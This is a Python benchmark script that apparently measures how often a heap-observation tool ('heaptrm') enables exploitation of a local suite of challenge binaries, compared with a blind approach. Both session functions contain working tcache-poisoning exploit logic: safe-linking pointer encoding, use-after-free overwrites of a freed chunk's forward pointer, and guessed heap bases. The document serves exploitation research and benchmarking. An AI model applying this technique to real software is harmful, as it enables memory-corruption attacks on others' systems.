heap-trm / bench /same_session_benchmark.py
amarck's picture
Defensible benchmark: heaptrm 65% vs blind 32% same-session
e1fab24
#!/usr/bin/env python3
"""
same_session_benchmark.py — The correct benchmark.
Both approaches run in the SAME process session:
  A: heaptrm session — observe addresses, compute exploit, execute in same session
  B: blind session — same binary, same protocol, but no heap observation
This tests: does structured heap observation enable exploitation that's
otherwise impossible? No LLM needed — the exploit logic is deterministic
given the addresses. The question is purely: can we GET the addresses?
"""
import subprocess
import json
import struct
import os
from pathlib import Path
from collections import defaultdict
# Repository root: two directory levels above this script.
ROOT = Path(__file__).parent.parent
# Directory holding the challenge binaries and their manifest.json.
SUITE = ROOT.joinpath("cve_tests", "suite")
# Path to the heaptrm executable, kept as a plain string for subprocess argv.
HEAPTRM = str(ROOT.joinpath("heaptrm-cli", "target", "release", "heaptrm"))
# Number of attempts per challenge for each of the two approaches.
TRIALS = 10
def heaptrm_session(binary: str, sc: int) -> bool:
    """Run one heaptrm-assisted exploit attempt inside a single process.

    Spawns ``HEAPTRM`` on *binary* and talks to it over a line-oriented JSON
    protocol: each request is ``{"action": ..., "data": ...}`` on one line and
    each reply is read back as one line of JSON. The session sends three
    ``1 <slot> <sc>`` commands and two ``4 <slot>`` commands (per the setup
    comment: allocate three, free two), asks heaptrm to ``observe`` the heap,
    derives a poisoned forward pointer from the observed chunk addresses, and
    replays the poisoning sequence in that same session.

    Args:
        binary: Path of the challenge binary passed to heaptrm.
        sc: Third field of every ``1 <slot> <sc>`` command (presumably a
            size class understood by the target -- confirm against the
            challenge protocol).

    Returns:
        True when the reply to the final ``3 2`` command has an ``output``
        field containing the hex marker ``50574e4544``; False when the
        observation is missing or incomplete, or when anything raises
        during the session.

    Raises:
        OSError: if the heaptrm executable itself cannot be started (the
            spawn happens before the best-effort ``try``).
    """
    proc = subprocess.Popen(
        [HEAPTRM, binary],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        text=True,
    )

    def cmd(action, data=""):
        """Send one JSON request line and return the decoded one-line reply."""
        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
        proc.stdin.flush()
        line = proc.stdout.readline()
        # An empty/blank line (e.g. EOF) is treated as an empty reply.
        return json.loads(line) if line.strip() else {}

    def by_address(chunk):
        """Numeric value of a chunk's hex ``address`` field."""
        return int(chunk["address"], 16)

    try:
        # Setup: alloc 3, free 2
        for slot in range(3):
            cmd("send", f"1 {slot} {sc}\n")
        cmd("send", "4 0\n")
        cmd("send", "4 1\n")

        # OBSERVE -- this is what heaptrm provides
        r = cmd("observe")
        if not r.get("heap"):
            cmd("quit")
            return False

        chunks = r["heap"]["chunks"]
        freed = sorted(
            (c for c in chunks if c["state"] == "freed"), key=by_address
        )
        allocated = sorted(
            (c for c in chunks if c["state"] == "allocated"), key=by_address
        )
        if len(freed) < 2 or not allocated:
            cmd("quit")
            return False

        # COMPUTE -- deterministic given addresses.
        # The highest-addressed freed chunk is the one whose fd gets
        # overwritten; the highest-addressed live chunk is the target.
        chunk1_addr = by_address(freed[-1])
        target_addr = by_address(allocated[-1])
        # Pointer is XOR-ed with (storage address >> 12), matching glibc's
        # safe-linking encoding of singly linked free-list pointers.
        poisoned = target_addr ^ (chunk1_addr >> 12)
        # "<Q" packs exactly 8 bytes, so the hex string is already 16 chars.
        fd_hex = struct.pack("<Q", poisoned).hex()

        # EXPLOIT -- in same session
        cmd("send", f"2 1 {fd_hex}\n")
        cmd("send", f"1 3 {sc}\n")
        cmd("send", f"1 4 {sc}\n")
        cmd("send", "2 4 50574e454421210a\n")
        r = cmd("send", "3 2\n")
        cmd("quit")
        return "50574e4544" in r.get("output", "")
    except Exception:
        # Deliberate best-effort: a broken pipe, malformed reply, or
        # unexpected schema all count as a failed trial, not a crash.
        return False
    finally:
        # Always reap the child and release both pipe descriptors so that
        # repeated trials do not accumulate open files or zombie processes.
        try:
            proc.kill()
            proc.wait(timeout=2)
        except (OSError, subprocess.TimeoutExpired):
            pass
        for pipe in (proc.stdin, proc.stdout):
            try:
                pipe.close()
            except OSError:
                pass
def blind_session(binary: str, sc: int, config: dict) -> bool:
    """Run one exploit attempt with no heap observation, in a single process.

    Drives *binary* directly through pwntools using the same command
    sequence as the heaptrm session, but may only use what the binary itself
    prints. The poisoned pointer is chosen by the first strategy that
    applies:

    1. Replies to the second and third ``1 <slot> <sc>`` commands both
       contain a ``0x...`` address: use them directly.
    2. No address for slot 1, but the ``3 1`` read returned at least 16 hex
       characters: decode them as a leaked pointer and undo the XOR with a
       guessed key.
    3. Only the first reply contains an address: assume 0x50 spacing.
    4. Otherwise: a single fixed guess based on a hard-coded heap base.

    Args:
        binary: Path of the challenge binary to execute.
        sc: Third field of every ``1 <slot> <sc>`` command (presumably a
            size class -- confirm against the challenge protocol).
        config: Manifest entry for the challenge. Currently unused; kept so
            callers can keep passing it.

    Returns:
        True when the reply to the final ``3 2`` command contains the hex
        marker ``50574e4544``; False otherwise, including when anything
        raises during the session.
    """
    from pwn import process as pwn_process, p64, context

    context.log_level = "error"
    p = pwn_process(binary)

    def do(line):
        """Send one command line and return the stripped one-line reply."""
        p.sendline(line.encode())
        return p.recvline(timeout=1).strip()

    try:
        replies = [do(f"1 {slot} {sc}") for slot in range(3)]
        do("4 0")
        do("4 1")

        # Try to extract info from binary output:
        # check for address leaks in the alloc replies.
        addrs = [None, None, None]
        for slot, reply in enumerate(replies):
            if reply and b"0x" in reply:
                try:
                    addrs[slot] = int(reply.split(b"0x")[1].split()[0], 16)
                except (ValueError, IndexError):
                    pass
        addr0, addr1, addr2 = addrs

        # Try UAF read
        leaked_fd = None
        leak = do("3 1")
        if leak and leak not in (b"DELETED", b"ERR") and len(leak) >= 16:
            try:
                # Read replies are hex dumps in memory order: the success
                # check below looks for "50574e4544", the leading bytes of
                # the payload written with "2 4 50574e45...". The first 8
                # bytes must therefore be decoded little-endian; parsing the
                # hex text as one big-endian number yields a byte-swapped
                # value that can never pass the range check further down.
                # NOTE(review): confirm against the challenge source.
                leaked_fd = int.from_bytes(
                    bytes.fromhex(leak[:16].decode("ascii")), "little"
                )
            except ValueError:
                pass

        # Compute based on available info
        poisoned = None
        if addr1 and addr2:
            poisoned = addr2 ^ (addr1 >> 12)
        elif leaked_fd and not addr1:
            # Decrypt fd with guessed key
            key = 0x555555559
            decrypted = leaked_fd ^ key
            if 0x555555550000 < decrypted < 0x555555570000:
                target = decrypted + 0xa0
                poisoned = target ^ key
        elif addr0 and not addr1 and not addr2:
            # Only first address -- guess offsets
            addr1_guess = addr0 + 0x50
            addr2_guess = addr0 + 0xa0
            poisoned = addr2_guess ^ (addr1_guess >> 12)

        if poisoned is None:
            # Pure blind -- guess a common layout. A wrong guess leaves the
            # free list corrupted, so only ONE guess fits in a session; the
            # remaining candidates would each need a fresh process and are
            # listed for reference only.
            base = 0x555555559000
            offsets = (0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550,
                       0x600, 0x650, 0x700)
            c1 = base + offsets[0] + 0x50
            tgt = c1 + 0x50
            poisoned = tgt ^ (c1 >> 12)

        # p64 yields exactly 8 bytes, i.e. 16 hex characters.
        do(f"2 1 {p64(poisoned).hex()}")
        do(f"1 3 {sc}")
        do(f"1 4 {sc}")
        do("2 4 50574e454421210a")
        result = do("3 2")
        return b"50574e4544" in result
    except Exception:
        # Best-effort: EOF, timeouts, or packing errors count as a failed
        # trial. KeyboardInterrupt/SystemExit are intentionally NOT caught.
        return False
    finally:
        try:
            p.close()
        except Exception:
            pass
def main():
    """Run every challenge in the suite manifest and report success rates.

    Reads ``manifest.json`` from ``SUITE``; for each entry whose binary
    exists, runs ``TRIALS`` heaptrm sessions and ``TRIALS`` blind sessions,
    prints one line per challenge, then a per-difficulty and overall summary
    table. Per-challenge results are written to
    ``bench/same_session_results.json`` relative to the current working
    directory.

    Manifest entries are expected to provide the keys ``name``,
    ``difficulty``, ``addr_leak``, ``uaf_read``, ``noise_min`` and
    ``noise_max``. If no challenge binary is found, a notice is printed and
    no results file is written.
    """
    manifest = json.loads(
        (SUITE / "manifest.json").read_text(encoding="utf-8")
    )
    rule = "=" * 80

    print(rule)
    print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)")
    print(f"{len(manifest)} challenges × {TRIALS} trials")
    print(rule)

    by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0})
    all_results = []

    for config in manifest:
        name = config["name"]
        binary = str(SUITE / name)
        if not Path(binary).exists():
            continue

        sc = 1
        ht = bl = 0
        for _ in range(TRIALS):
            if heaptrm_session(binary, sc):
                ht += 1
            if blind_session(binary, sc, config):
                bl += 1

        diff = config["difficulty"]
        bucket = by_diff[diff]
        bucket["ht"] += ht
        bucket["bl"] += bl
        bucket["n"] += TRIALS

        delta = ht - bl
        if delta > TRIALS // 2:
            marker = ">>>"
        elif delta > 0:
            marker = ">"
        elif delta == 0:
            marker = "=="
        else:
            marker = "<"

        info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}"
        print(f" {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}")

        all_results.append({
            "name": name, "difficulty": diff,
            "heaptrm": ht, "blind": bl, "trials": TRIALS,
            **{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]}
        })

    total_n = sum(d["n"] for d in by_diff.values())
    if total_n == 0:
        # Empty manifest or no binaries built: there is nothing to average,
        # and dividing by zero below would crash the run.
        print(f"\nNo challenge binaries found under {SUITE}; nothing to report.")
        return

    print("\n" + rule)
    print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}")

    # Known difficulties first, in their natural order; any other labels
    # from the manifest follow so they are not silently left out of the table.
    known = ["easy", "medium", "hard", "extreme"]
    ordered = [d for d in known if d in by_diff]
    ordered += sorted(d for d in by_diff if d not in known)
    for diff in ordered:
        d = by_diff[diff]
        if d["n"] == 0:
            continue
        ht_pct = d["ht"] / d["n"] * 100
        bl_pct = d["bl"] / d["n"] * 100
        print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%")

    total_ht = sum(d["ht"] for d in by_diff.values())
    total_bl = sum(d["bl"] for d in by_diff.values())
    print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%")

    # Output location is relative to the current working directory.
    Path("bench").mkdir(exist_ok=True)
    with open("bench/same_session_results.json", "w") as f:
        json.dump(all_results, f, indent=2)


# Run the benchmark only when executed as a script, not when imported.
if __name__ == "__main__":
    main()